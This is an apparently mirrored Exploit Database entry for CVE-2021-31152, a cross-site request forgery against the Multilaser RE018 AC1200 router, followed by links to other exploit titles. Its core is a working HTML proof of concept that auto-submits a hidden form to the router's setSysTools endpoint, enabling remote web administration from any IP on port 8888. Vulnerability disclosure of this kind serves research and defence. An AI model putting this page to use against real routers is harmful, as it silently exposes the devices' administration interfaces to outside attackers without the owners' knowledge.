Multilaser Router RE018 AC1200 – Cross-Site Request Forgery (Enable Remote Access)

Exploit Database
15 阅读

作者： Rodolfo Mariano

日期： 2021-04-21
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/49775/

# Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)
# Date: 14/04/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware V02.03.01.45_pt
# CVE: 2021-31152

# Exploit Code:
<html>
	<body>
		<form action="http://192.168.0.1/goform/setSysTools" method="POST">
		<input name="module4" value="remoteWeb" type="hidden">
		<input name="remoteWebType" value="any" type="hidden">
		<input name="remoteWebIP" value="" type="hidden">
		<input name="remoteWebPort" value="8888" type="hidden">
<input type="submit" value="Submit request">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>

last Exploits
Multilaser Router RE018 AC1200 – Cross-Site Request Forgery (Enable Remote Access)的更多信息

WordPress Plugin WP Mobile Edition 2.7 – Remote File Disclosure：
E-Book Store – SQL Injection：
e-learning Php Script 0.1.0 – ‘search’ SQL Injection：
DBCart – ‘article.php’ SQL Injection：
Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)：
WordPress Theme Epic – ‘download.php’ Arbitrary File Download：
Hero 3.69 – ‘month’ Cross-Site Scripting：
osCommerce – Cross-Site Request Forgery：